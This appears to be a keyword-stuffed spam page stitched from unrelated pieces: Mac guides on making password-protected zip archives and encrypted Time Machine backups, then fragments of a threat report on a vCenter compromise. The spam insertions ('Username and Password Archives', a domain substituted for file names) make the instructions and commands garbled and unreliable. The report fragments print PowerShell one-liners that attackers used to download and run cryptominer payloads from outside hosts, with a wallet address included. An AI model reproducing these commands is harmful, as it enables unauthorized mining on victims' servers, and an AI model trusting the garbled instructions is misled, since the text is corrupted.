        This is your Mac&#;s name, current directory location (~ is a shortcut for your home folder), and your username. This is called a &#;prompt,&#; and it displays when Terminal is waiting for you to enter a command.

      2. In this example, I have a file on my desktop &#;shoppingdowntown.us&#; that I want to put in a password protected .zip archive. In Terminal, I type the following:
      3. &#;zip -ej &#; (including the space at the end) tells Terminal you want to create a zip archive (zip) with encryption (e) and no file paths included (j). Next, you have to tell it where to save the zip file and what name it must get. The easiest thing is to just use your desktop which can be entered as &#;~/Desktop.&#; When done, it should look like this (add a space after the file extension):
      4. Now Terminal needs to know which file is to be archived. The simplest way to do this is to drag the file you want to encrypt into the Terminal window. This adds the file path to Terminal. The result should look something like this; make sure there&#;s a space between the two file paths, and this example assumes that you&#;ve dragged a Username and Password Archives (shoppingdowntown.us) from your Desktop.
      5. Press Enter and Terminal prompts you for a password that will be required to open the .zip file. Terminal will not show any cursor movements while you type the password. Press Enter, and you are asked to verify the password by typing it again. Press Enter Bandicam Download Free 2019 Latest Version third time and Terminal creates the zip Username and Password Archives. For my example, when Terminal was done, I saw this:
      1. This created &#;shoppingdowntown.us&#; on my desktop. When you double-click the file to open it, you see a password request in Archive Utility, the application that expands archives on macOS.

Archiving a Folder

      1. Open Terminal.
      2. For this example, I have a folder on my Desktop named Photos that I want to put in a password protected .zip file. The command to archive a folder is slightly different:

        As with archiving a single file, zip tells Terminal what kind of archive to create and the (e) in -er tells it to encrypt the file. In this case the (r) means recursive, which tells Terminal to archive all the folder contents, even if they are in sub-folders.

      3. Since we&#;re already pointed at the desktop, specifying the saved file name does not require any path information, In my case I am saving it as &#;shoppingdowntown.us&#; so I end up with (make sure to leave a space at the end):
      4. Add the folder by dragging it onto the Terminal window, and I see this:
      5. After entering and verifying the password I end up with this:

As you can see above, the zip command shows you how much space it&#;s saved for each item in the folder. Since these photos are already compressed, no space is saved, Username and Password Archives, but what&#;s important here is protecting the archive Username and Password Archives a password. In other cases, you will save space when performing this operation.

Encrypt Backups

Your Mac may be set up like Fort Knox, but your backups are copied to an external drive or server. If your backups are not encrypted, an unauthorized user doesn&#;t need to go through all the trouble of accessing your Mac; they can just take your backups instead. Luckily, Apple makes it very easy to encrypt Time Machine backups. There are two ways to do this, and I will cover both. In this example, I will walk through the first time setup of Time Machine.

To set up an encrypted Time Machine backup, follow these steps:

How to Back up to an External Drive or Username and Password Archives Drive Partition

      1. Open System Preferences, then click the Time Machine icon; click the padlock to make changes if needed, and then click Select Backup Disk.
      2. Select an external drive or partition to use as a backup destination, Username and Password Archives. Make sure to check Encrypt backups.
      3. Set a strong password and a hint. (Choosing a password hint is mandatory.) When you click Use Disk, Time Machine begins the encryption process. A progress bar displays as the drive or partition is prepared, then the backup starts while the encryption runs in the background.
      4. The backup data is stored in a &#;shoppingdowntown.usdb&#; folder that you can open and browse, just as on an unencrypted drive. It correctly assumes that since the drive or partition itself is encrypted there is no need to wrap the backups in an encrypted disk image.

How to Back up to a Server, NAS, or Time Capsule

The process for backing up to a server, such as a NAS or file server, is similar to that of backing up to an external drive drive partition. You can also back up to a Time Capsule, Apple&#;s wi-fi router with a built-in hard disk, that was discontinued in If you are backing up to a NAS, check the documentation for that device to find out how to turn on Time Machine discovery, if this is available. And you can also back up any Mac to another Mac, if file sharing is turned on. See this Apple support document for information about using a network device for Time Machine backups.

Follow these steps to backup your Username and Password Archives to a server:

      1. In the Time Machine preferences, and select your server or NAS destination, then click &#;Use Disk.&#;

  • A password request displays: this is the password for your server or NAS.
  • After you authenticate, you are prompted to set a password to encrypt the backup. In this case no hint is required.

 

 

  • The backup will begins momentarily. Because the backup is Username and Password Archives on a network volume it is not stored as a &#;shoppingdowntown.usdb&#; folder but an encrypted sparse bundle image instead. As explained above, this is a type of disk image that expands when more space is needed for additional files.

 

Distributing Files Securely

When you want to send files securely to others &#; friends, family, or colleagues &#; there are many options, and the one you choose depends on the size of the files you want to send, and which software they use, Username and Password Archives. As mentioned above, Username and Password Archives, you can send an encrypted disk image or zip archive by email, using Apple&#;s MailDrop, and not have to worry about the attachment being intercepted, because it&#;s protected by a password.

But there are other ways to send files securely. You can use secure messaging, such as iMessage; you can use online secure file transfer services, such as WeTransfer; you can even use cloud storage, like iCloud, Dropbox, or OneDrive. Because cloud services store files securely, transferring files to others can be as easy as uploading them to your cloud storage service, then sending a link to someone else.

Read our article How to Send Files Securely for more on the various ways to send files securely.

Summing Up

This article has shown you the many ways you can ensure that data and files on your Mac is secure. While this may seem like a lot of work at first, one you set up some of these routines, you&#;ll find that it becomes second nature. Take some time to think about how to secure your files, so you don&#;t have to worry about your data being stolen.

How can I learn more?

Each week on the Intego Mac Podcast, Intego&#;s Mac security experts discuss the latest Apple news, security and privacy stories, and offer practical advice on getting the most out of your Apple devices. Be sure to follow the podcast to make sure you don’t miss any episodes.

You can also subscribe to our e-mail newsletter and keep an eye here on Mac Security Blog for the latest Apple security and privacy news. And don&#;t forget to follow Intego on your favorite social media channels: Facebook, Instagram, Twitter, Username and Password Archives, and YouTube.

About Jay Vrijenhoek

Jay Vrijenhoek is an IT consultant with a passion for Mac security research. View all posts by Jay Vrijenhoek → This entry was posted in How To and tagged Apple, encryption, FileVault, Mac, password security. Bookmark the permalink.
Источник: [shoppingdowntown.us]
Out-String; $out %{$_ -replace '"url": *".*",', '"url": "[.]",'}

Imagine you’re staring at a file or folder—perhaps confidential employee information that you need to send to your accountant. If attaching it to an email message makes you think, “That doesn’t seem like a good idea,” award yourself a gold star!

Sending sensitive files via email is a bad idea, partly because the email could be intercepted in transit (possible but highly unlikely), but more because the files then live in both your and your recipient’s email accounts in an unprotected form. If an attacker were to gain access to either of your email accounts, they might scan for patterns like credit card numbers, ID numbers, phone numbers, and postal addresses and find them even in attachments.

There are ways of encrypting email messages so they can be read only by the recipient and never exist in an unencrypted form other than while being created or read, but they’re difficult to set up and fussy to use. For most people, most of the time, encrypted email is overkill.

For a more straightforward solution to exchanging information securely via email, use password-protected and encrypted ZIP archives. They’re easy to create on the Mac, either using a simple command in Terminal or with a third-party utility. And better yet, any Mac user can expand them using the built-in Archive Utility simply by double-clicking and entering the necessary password.

Create Encrypted ZIP Archive Using Terminal

Although many Mac users are intimidated by using the Unix command line in Terminal, making an encrypted ZIP archive is easy enough for anyone. All Username and Password Archives takes is typing a single command, dragging a file or folder Username and Password Archives Terminal, Username and Password Archives, and entering a password twice. Follow these steps, which make an encrypted ZIP archive on your Desktop:

  1. In your Applications folder, open the Utilities folder and double-click Terminal to launch it.
  2. Type (or copy and paste) this command, replacing “archiveName” with whatever you want to name the ZIP file and making sure to type a space after Username and Password Archives last letter—the “p” in “zip&rdquo. (The tilde ~ character is Shift-backtick, and it’s the key to the left of the numeral 1 key.) zip -er ~/Desktop/shoppingdowntown.us
  3. Drag the file or folder you want to protect into the Terminal window to complete the command.
  4. Press Return, and when prompted, enter the desired password twice—the second time is for confirmation.
    Terminal encrypted Zip x

Create Encrypted ZIP Archive Using Archiver

If you have trouble with the command-line method or plan to create encrypted ZIP archives regularly, it’s worth using a Mac app that simplifies the process even more. There are various apps, but a particularly straightforward one for those running macOS 11 Big Sur is Archiver ($, with a free trial), Username and Password Archives. Download it and then follow these steps to create an encrypted ZIP archive:

  1. Launch Archiver.
    Archiver 1
  2. Drag a file or folder to the Archiver window and click the Archive button in the toolbar.
    Archiver 2
  3. Select the archive format (use ZIP), click the Encrypt checkbox, enter the password twice, and click the Archive button in the toolbar.
    Archiver 3
  4. Drag the ZIP archive to the Desktop or another folder and click the Done button.
    Archiver 4

Decrypting a ZIP Archive

As noted earlier, decrypting a password-protected ZIP archive on the Mac is as simple as double-clicking it and entering the password when prompted.

Decrypt Zip archive Mac

What about iOS or iPadOS? Never fear, since the Files app can also decrypt ZIP archives; just tap the archive to open it and enter the password when prompted.

Decrypt Zip archive iPhone x

A Word about Passwords

It’s important to think briefly about how you’re going to communicate the password to your recipient. Don’t send it in email or Username and Password Archives anyone who compromises either your email account or your recipient’s account could decrypt the ZIP archive.

Instead, use what’s called an “out of band” communication channel. In other words, if you’re going to send the ZIP archive via email, communicate the password in a phone call or text message. That would keep the password safe if either of your email accounts were compromised.

If you’re sending password-protected ZIP archives to a particular person regularly (and the files don’t contain state or corporate secrets), you could agree on a system for generating passwords so you don’t have to communicate each one individually. For instance, you could combine a random word and the current month, so the password would be “cheddar9September” one month and “cheddar10October” the next.

As you can see, you can use this technique with so little extra effort that it’s worth ensuring a higher level of security whenever you need to share confidential information.

(Featured image by shoppingdowntown.us vijayan)


Social Media: It’s good to be cautious about attaching sensitive files to email—if either your or your recipient’s email account were to be compromised, confidential information could be revealed. Instead, send password-protected ZIP archives. Here’s how:

Источник: [shoppingdowntown.us]
Out-String > "$env:tmp\$($shoppingdowntown.us())-$($li)" $p = $c $ur = $shoppingdowntown.usFile("$u/shoppingdowntown.us""$env:tmp\$($shoppingdowntown.us())-$($li)") } sleep 3 }

Uncertainty about who did what on the compromised server comes from the fact that there were so many actors who were in play, thanks to the detectability of the vCenter vulnerability with mass Internet scans.

Extra compromises

On May 18, another entirely different actor also exploited the vCenter vulnerability to install an XMR cryptocurrency miner via PowerShell commands:

powershell -nop -w hidden -Command $wc = New-Object shoppingdowntown.usent; $tempfile = [shoppingdowntown.us]::GetTempFileName(); $tempfile += '.exe'; $shoppingdowntown.usadFile('hxxp://[.]/w', Username and Password Archives, $tempfile); &amp; $tempfile -u bdbe; Remove-Item -Force $tempfile

The miner operator then executed the payload, shoppingdowntown.us, which in turn registered the Windows driver WinRing0xsys as a service to leverage the server’s graphics card for mining purposes.

On September 8, yet another intruder dropped yet another miner (XMRig):

powershell -Command $wc = New-Object shoppingdowntown.usent; $tempfile = [shoppingdowntown.us]::GetTempFileName(); $tempfile += '.bat'; $shoppingdowntown.usadFile('hxxp://[.] /shoppingdowntown.us', $tempfile); &amp; $tempfile 43a6eY5zPm3UFCaygfsukfP94ZTHz6a1kZh5sm1aZFBWBnZXPbGtYjRE7pqc2s9dCQ5R2yk1V7SZk TWeBk6JiT2q5cXLa7T; Remove-Item -Force $tempfile powershell -Command $wc = New-Object shoppingdowntown.usent; $shoppingdowntown.usadFile('http://lurchmath[.] org/wordpress-temp/ wp-content/plugins /shoppingdowntown.us', 'C:\Windows\system32\config\systemprofile\shoppingdowntown.us') powershell -Command $wc = New-Object shoppingdowntown.usent; $tempfile = [shoppingdowntown.us]::GetTempFileName(); $tempfile += '.bat'; $shoppingdowntown.usadFile('hxxp://[.]/shoppingdowntown.us', $tempfile); &amp; $tempfile 43a6eY5zPm3UFCaygfsukfP94ZTHz6a1kZh5sm1aZFBWBnZXPbGtYjRE7pqc2s9dCQ5R 2yk1V7SZkTWeBk6JiT2q5cXLa7T; Remove-Item -Force $tempfile powershell -Command $out = cat 'C:\Windows\system32\config\systemprofile\mimu\shoppingdowntown.us' Username and Password Archives

Notice: Undefined variable: z_bot in /sites/shoppingdowntown.us/developer/username-and-password-archives.php on line 99

Notice: Undefined variable: z_empty in /sites/shoppingdowntown.us/developer/username-and-password-archives.php on line 99

Comments

Leave a Reply

Your email address will not be published. Required fields are marked *